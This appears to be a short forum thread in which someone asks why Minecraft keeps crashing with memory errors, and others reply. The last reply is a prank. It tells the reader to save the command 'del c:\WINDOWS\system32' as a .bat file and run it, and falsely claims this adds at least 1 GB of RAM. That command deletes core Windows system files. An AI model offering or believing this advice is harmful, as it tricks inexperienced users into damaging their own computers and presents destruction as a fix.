I have some 3 free day trial and my minecraft game keeps crashing and it says I need more memory.

yeah my friend has that issue.
all the memory tweaks and java ram allotting dont fix it. (it just improves it if you arent crashing already)

i think his ram is errored up old though. he has other game crashing issues when he does a simple thing like change his active fullscreen window of a game or something.

It seems impossible to download RAM off a suspicious site.

del c:\WINDOWS\system32

Save it as a .bat file on your desktop, and then double-click it.
Did it work? If it did, you should have at least 1gb more RAM!
